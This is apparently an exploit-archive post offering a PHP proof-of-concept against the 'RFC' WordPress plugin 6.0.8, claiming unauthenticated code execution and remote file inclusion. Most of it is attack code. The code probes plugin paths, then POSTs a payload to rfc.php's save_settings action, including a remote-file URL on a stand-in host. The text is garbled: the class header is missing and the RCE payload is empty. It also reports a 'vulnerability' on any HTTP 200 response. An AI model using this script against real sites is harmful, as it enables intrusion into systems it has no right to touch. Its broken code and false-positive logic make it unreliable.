============================================================================================================================================= | # Title : WordPress RFC Plugin 6.0.8 Security Scanner | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://wordpress.org/plugins/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/179099/ [+] Summary : The RFC WordPress Plugin version 6.0.8 contains critical security vulnerabilities that allow unauthenticated attackers to execute arbitrary code and include remote files on the target system. [+] POC : php poc.php target = rtrim($target_url, '/'); $this->user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'; } public function test_plugin_existence() { $common_paths = [ '/wp-content/plugins/rfc-wordpress/rfc.php', '/wp-content/plugins/rfc/rfc.php', '/wp-content/plugins/rfc-wordpress-plugin/rfc.php', '/wp-content/plugins/rfc-wp/rfc.php' ]; echo "Testing plugin existence...\n"; foreach ($common_paths as $path) { $url = $this->target . $path; $exists = $this->check_url_exists($url); if ($exists) { echo "✓ Plugin found: $url\n"; return $path; } else { echo "✗ Not found: $path\n"; } } return false; } public function test_rce_vulnerability($plugin_path = null) { if (!$plugin_path) { $plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php'; } $url = $this->target . $plugin_path; $payload = ""; $post_data = array( 'rfc_action' => 'save_settings', 'rfc_settings' => $payload ); echo "Testing RCE at: $url\n"; return $this->send_post_request($url, $post_data, "RCE"); } public function test_rfi_vulnerability($plugin_path = null) { if (!$plugin_path) { $plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php'; } $url = $this->target . $plugin_path . '?rfc_action=save_settings'; $payload = "http://example.com/test.txt"; $post_data = array( 'rfc_settings' => $payload ); echo "Testing RFI at: $url\n"; return $this->send_post_request($url, $post_data, "RFI"); } private function check_url_exists($url) { $ch = curl_init(); curl_setopt_array($ch, array( CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_NOBODY => true, // HEAD request فقط CURLOPT_TIMEOUT => 5, CURLOPT_USERAGENT => $this->user_agent, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false )); curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ($http_code == 200); } private function send_post_request($url, $data, $exploit_type) { $ch = curl_init(); curl_setopt_array($ch, array( CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_SSL_VERIFYPEER => false, CURLOPT_TIMEOUT => 10, CURLOPT_FOLLOWLOCATION => true, CURLOPT_USERAGENT => $this->user_agent, CURLOPT_HEADER => true // للحصول على ال headers )); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $error = curl_error($ch); curl_close($ch); echo "HTTP Response Code: $http_code\n"; if ($error) { return "❌ Error in $exploit_type: " . $error . "\n"; } if ($http_code == 200) { return "✅ $exploit_type test completed - Potential vulnerability detected (HTTP 200)\n"; } elseif ($http_code == 404) { return "❌ $exploit_type test failed - Plugin not found (404)\n"; } elseif ($http_code == 403) { return "❌ $exploit_type test failed - Access forbidden (403)\n"; } else { return "⚠️ $exploit_type test - HTTP Code: $http_code (May require further analysis)\n"; } } public function full_scan() { echo "=== WordPress RFC Plugin Security Scanner ===\n"; echo "Target: " . $this->target . "\n\n"; // الخطوة 1: البحث عن المسار الصحيح $plugin_path = $this->test_plugin_existence(); if (!$plugin_path) { echo "\n❌ RFC WordPress plugin not found on target.\n"; echo "Possible reasons:\n"; echo "- Plugin not installed\n"; echo "- Different plugin name/path\n"; echo "- Target is not WordPress\n"; echo "- Access restrictions\n"; return; } echo "\n✅ Plugin found! Starting vulnerability tests...\n\n"; // الخطوة 2: اختبار الثغرات $result1 = $this->test_rce_vulnerability($plugin_path); echo $result1 . "\n"; $result2 = $this->test_rfi_vulnerability($plugin_path); echo $result2 . "\n"; echo "\n=== Scan Complete ===\n"; } } // الاستخدام if ($argc > 1) { $target = $argv[1]; } else { $target = "https://target.com"; // غير هذا بالهدف الحقيقي } echo "WordPress RFC Plugin Security Scanner\n"; echo "=====================================\n\n"; $tester = new WordPressExploitTester($target); $tester->full_scan(); // استخدام بديل إذا أردت اختبار موقع محلي class LocalTest { public static function test_local_setup() { echo "\n=== Local Test Mode ===\n"; $test_urls = [ 'http://localhost/wordpress', 'http://127.0.0.1/wordpress', 'http://localhost:8080', 'http://test.local' ]; foreach ($test_urls as $test_url) { echo "Testing: $test_url\n"; $tester = new WordPressExploitTester($test_url); $tester->test_plugin_existence(); echo "---\n"; } } } // لتفعيل الاختبار المحلي، أزل التعليق من السطر التالي: // LocalTest::test_local_setup(); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================